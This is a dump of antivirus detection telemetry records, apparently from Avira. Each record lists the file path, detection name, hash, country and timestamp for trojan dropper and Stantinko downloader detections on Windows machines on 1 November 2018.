  Row(detection=Row(filename='avscan-20181101-152357-4c3d0b94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152357-4C3D0B94', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152405-4d9fc0b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152405-4D9FC0B9', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152403-4d5605a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152403-4D5605A6', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152406-4dd30afe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152406-4DD30AFE', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='symsilent.pif', filepath='C:\\Users\\X\\Symantec\\SymSilent\\SymSilent.pif', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='symsilent.pif', filepath='C:\\Users\\X\\Symantec\\SymSilent\\SymSilent.pif', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152402-4d228b9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152402-4D228B9B', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152400-4cd95dd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152400-4CD95DD1', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152356-4c0b1b71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152356-4C0B1B71', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152355-4bbeb2aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152355-4BBEB2AA', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152359-4c895f4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152359-4C895F4A', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152345-49efeecb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152345-49EFEECB', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152354-4b902c8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152354-4B902C8E', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212349-edeb8744', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212349-EDEB8744', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212610-026f5b7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212610-026F5B7E', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:26:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212740-0f7a1f12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212740-0F7A1F12', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:28:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213545-55edf1d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213545-55EDF1D6', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213607-5939faee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213607-5939FAEE', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213623-5b8733be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213623-5B8733BE', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213554-57429343', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213554-57429343', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212306-e7ca2286', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212306-E7CA2286', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212252-e5b873f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212252-E5B873F2', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212246-e4c798c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212246-E4C798C5', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212315-e91cb3ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212315-E91CB3BA', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212312-e8970402', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212312-E8970402', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212242-e43e961c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212242-E43E961C', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213420-499ce400', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213420-499CE400', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213430-4b1c2624', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213430-4B1C2624', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212744-102b527b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212744-102B527B', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:28:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213529-53a6f267', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213529-53A6F267', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213658-609683a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213658-609683A9', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213704-61683852', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213704-61683852', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213730-653af3f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213730-653AF3F6', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212355-eed2a5b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212355-EED2A5B9', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212436-f4cec606', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212436-F4CEC606', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212340-ecab31b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212340-ECAB31B8', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212359-ef7ca5f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212359-EF7CA5F9', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213202-359c6efe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213202-359C6EFE', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:32:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213234-3a2dbb4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213234-3A2DBB4C', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:32:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212112-d71ebae0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212112-D71EBAE0', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212056-d4cfa933', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212056-D4CFA933', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212121-d8742f6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212121-D8742F6A', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213125-303ffd0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213125-303FFD0D', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:48Z'), dt=datetime.date(2018, 11, 1)),
